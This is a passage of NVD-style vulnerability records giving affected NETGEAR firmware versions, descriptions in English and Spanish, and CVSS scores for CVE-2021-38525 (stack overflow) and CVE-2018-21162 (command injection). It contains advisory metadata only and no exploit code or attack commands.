"matchCriteriaId": "2451CC0C-71B2-474D-93F0-2B2ACD802FE3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6020_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DAD3FA3E-6629-4C40-B8DB-8CDF824A9E0D",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6020:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5DDA7ABF-4C4B-4945-993A-F93BD8FCB55E",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EDB0CD0A-A68D-4EF5-A938-6A15604C9107",
"versionEndExcluding": "1.0.1.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "363D4DEE-98B9-4294-B241-1613CAD1A3A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6080_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1CCD6658-5418-4FF3-B471-A482A9499487",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6080:-:*:*:*:*:*:*:*",
"matchCriteriaId": "1CEB5C49-53CF-44AE-9A7D-E7E6201BFE62",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "92F53D21-C688-4477-815D-EFFF08F7D085",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D18D2CCD-424F-41D5-919B-E22B9FA68D36",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "220EBC67-69DA-43D6-8B09-EBEEEF29679D",
"versionEndExcluding": "1.1.0.80",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "B131B5C8-CB7F-433B-BA32-F05CE0E92A66",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6260_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "16D72B7A-0707-428F-A9AE-5899EBF4BBA0",
"versionEndExcluding": "1.1.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6260:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3C395D49-57F9-4BC1-8619-57127355B86B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0CC022BD-49D5-442A-B76D-663923A52B8D",
"versionEndExcluding": "1.0.4.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD6FD0FE-1431-4E39-8D07-B4AFE5BDB1B6",
"versionEndExcluding": "1.0.2.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4A4FB8A1-D380-4234-88EB-91BFF6D215C7",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "9F9706E6-CA53-43E4-91B0-D52655C86860",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3C39CE79-6433-47E2-A439-9AB1DFBD843C",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "09404083-B00B-4C1F-8085-BC242E625CA3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E921ACD-4ED9-4FFD-AF96-F2E1D75F8C96",
"versionEndExcluding": "1.0.2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "103B19E9-C72D-43C2-8369-1C425E9B9AC7",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB6992BA-B0F5-4E00-84F4-0B0336910AFA",
"versionEndExcluding": "1.2.0.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "2E8EB69B-6619-47B6-A073-D0B840D4EB0B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6156A20E-83E6-44AD-9A57-40E3249047D4",
"versionEndExcluding": "1.0.9.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E23D8A41-75D8-4067-A961-3B81276527A8",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7800_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52E997BC-B5C7-4FBA-9535-6A0BA398F8C3",
"versionEndExcluding": "1.0.2.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "17CF7445-6950-45FE-9D1A-E23F63316329",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E5AC056A-DF92-4CA7-9919-2C9BDAE3C32D",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0F859165-8D89-4CDD-9D48-9C7923D2261F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r9000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F1F914AD-70DC-47F5-A2F7-672DBE89C62E",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r9000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D74F1BFC-562E-4E7D-BBAB-2F8B593B5A57",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:xr500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8752321F-E9BF-427B-88FD-B67014FB2FD5",
"versionEndExcluding": "2.3.2.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:xr500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9E203D92-F97B-4F5B-B395-3A5DEDBF1C1C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects D3600 before 1.0.0.76, D6000 before 1.0.0.76, D6200 before 1.1.00.36, D7000 before 1.0.1.70, EX6200v2 before 1.0.1.78, EX7000 before 1.0.1.78, EX8000 before 1.0.1.186, JR6150 before 1.0.1.18, PR2000 before 1.0.0.28, R6020 before 1.0.0.42, R6050 before 1.0.1.18, R6080 before 1.0.0.42, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6260 before 1.1.0.64, R6300v2 before 1.0.4.34, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7800 before 1.0.2.60, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.40."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer en la regi\u00f3n stack de la memoria por un usuario autenticado. Esto afecta a D3600 versiones anteriores a 1.0.0.76, D6000 versiones anteriores a 1.0.0.76, D6200 versiones anteriores a 1.1.00.36, D7000 versiones anteriores a 1.0.1.70, EX6200v2 versiones anteriores a 1.0.1.78, EX7000 versiones anteriores a 1.0.1.78, EX8000 versiones anteriores a 1. 0.1.186, JR6150 versiones anteriores a 1.0.1.18, PR2000 versiones anteriores a 1.0.0.28, R6020 versiones anteriores a 1.0.0.42, R6050 versiones anteriores a 1.0.1.18, R6080 versiones anteriores a 1.0.0.42, R6120 versiones anteriores a 1.0.0.46, R6220 versiones anteriores a 1. 1.0.80, R6260 versiones anteriores a 1.1.0.64, R6300v2 versiones anteriores a 1.0.4.34, R6700 versiones anteriores a 1.0.2.6, R6700v2 versiones anteriores a 1.2.0.36, R6800 versiones anteriores a 1.2.0.36, R6900 versiones anteriores a 1.0.2.4, R6900P versiones anteriores a 1.3.1. 64, R6900v2 versiones anteriores a 1.2.0.36, R7000 versiones anteriores a 1.0.9.42, R7000P versiones anteriores a 1.3.1.64, R7800 versiones anteriores a 1.0.2.60, R8900 versiones anteriores a 1.0.4.12, R9000 versiones anteriores a 1.0.4.12 y XR500 versiones anteriores a 2.3.2.40"
}
],
"id": "CVE-2021-38525",
"lastModified": "2024-11-21T06:17:20.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2021-08-11T00:16:09.323",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000063759/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2018-0378"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000063759/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2018-0378"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-23 21:15
Modified
2024-11-21 04:03
Severity ?
Summary
Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects D6400 before 1.0.0.78, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.8, R6300v2 before 1.0.4.6, R6400 before 1.0.1.12, R6700 before 1.0.1.16, R7000 before 1.0.7.10, R7100LG before 1.0.0.42, R7300DST before 1.0.0.44, R7900 before 1.0.1.12, R8000 before 1.0.3.36, R8300 before 1.0.2.74, R8500 before 1.0.2.74, WNDR3400v3 before 1.0.1.14, and WNR3500Lv2 before 1.2.0.48.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | d6400_firmware | * | |
| netgear | d6400 | - | |
| netgear | ex6200_firmware | * | |
| netgear | ex6200 | - | |
| netgear | ex7000_firmware | * | |
| netgear | ex7000 | - | |
| netgear | r6250_firmware | * | |
| netgear | r6250 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | - | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7100lg_firmware | * | |
| netgear | r7100lg | - | |
| netgear | r7300dst_firmware | * | |
| netgear | r7300dst | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8300_firmware | * | |
| netgear | r8300 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - | |
| netgear | wndr3400_firmware | * | |
| netgear | wndr3400 | v3 | |
| netgear | wnr3500l_firmware | * | |
| netgear | wnr3500l | v2 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7AD596B6-3D11-456F-8BD0-2E7153BA5F53",
"versionEndExcluding": "1.0.0.78",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "03DFA0CD-2C01-4885-B126-E24FCA5F9D6B",
"versionEndExcluding": "1.0.3.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E2EC7119-878C-4E8F-97B0-DAD86E138F8C",
"versionEndExcluding": "1.0.0.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "13B4777D-CC2E-4A6B-946F-3E511D8D4B36",
"versionEndExcluding": "1.0.4.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DBB42C46-A4AB-4AEC-A78D-082F9C63B0B8",
"versionEndExcluding": "1.0.4.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1866BDEF-FB37-4477-B0F2-87283983648D",
"versionEndExcluding": "1.0.1.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1A08B1CF-6BDA-4D50-9146-2B580593FBAD",
"versionEndExcluding": "1.0.1.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B94C2A0A-F26B-4CD2-A91E-DD62C5F788B3",
"versionEndExcluding": "1.0.7.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B3D808FE-AA8D-40DF-B838-4853EB8911E7",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9D512A22-2535-4069-BAEB-19FDB15304E2",
"versionEndExcluding": "1.0.0.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "59C6F6E4-C411-486E-BDBF-75F0ABEF5112",
"versionEndExcluding": "1.0.1.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B91B7AB8-E499-416D-8E63-C49CDA753C3C",
"versionEndExcluding": "1.0.3.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "40529B5B-A0CF-4761-B623-9981F5821C1E",
"versionEndExcluding": "1.0.2.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC34CE8E-8DB9-4A15-80D8-EB663482A892",
"versionEndExcluding": "1.0.2.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DF8551B9-72D9-46B8-9F66-EE7841E29A26",
"versionEndExcluding": "1.0.1.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "263DFC40-2EED-49F3-AAA5-0F5D7EAC2DF3",
"versionEndExcluding": "1.2.0.48",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects D6400 before 1.0.0.78, EX6200 before 1.0.3.86, EX7000 before 1.0.0.64, R6250 before 1.0.4.8, R6300v2 before 1.0.4.6, R6400 before 1.0.1.12, R6700 before 1.0.1.16, R7000 before 1.0.7.10, R7100LG before 1.0.0.42, R7300DST before 1.0.0.44, R7900 before 1.0.1.12, R8000 before 1.0.3.36, R8300 before 1.0.2.74, R8500 before 1.0.2.74, WNDR3400v3 before 1.0.1.14, and WNR3500Lv2 before 1.2.0.48."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una inyecci\u00f3n de comandos por parte de un atacante no autenticado. Esto afecta a D6400 versiones anteriores a 1.0.0.78, EX6200 versiones anteriores a 1.0.3.86, EX7000 versiones anteriores a 1.0.0.64, R6250 versiones anteriores a 1.0.4.8, R6300v2 versiones anteriores a 1.0.4.6, R6400 versiones anteriores a 1.0.1.12, R6700 versiones anteriores a 1.0.1.16, R7000 versiones anteriores a 1.0.7.10, R7100LG versiones anteriores a 1.0.0.42, R7300DST versiones anteriores a 1.0.0.44, R7900 versiones anteriores a 1.0.1.12, R8000 versiones anteriores a 1.0.3.36, R8300 versiones anteriores a 1.0.2.74, R8500 versiones anteriores a 1.0.2.74, WNDR3400v3 versiones anteriores a 1.0.1.14 y WNR3500Lv2 versiones anteriores a 1.2.0.48."
}
],
"id": "CVE-2018-21162",
"lastModified": "2024-11-21T04:03:03.257",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
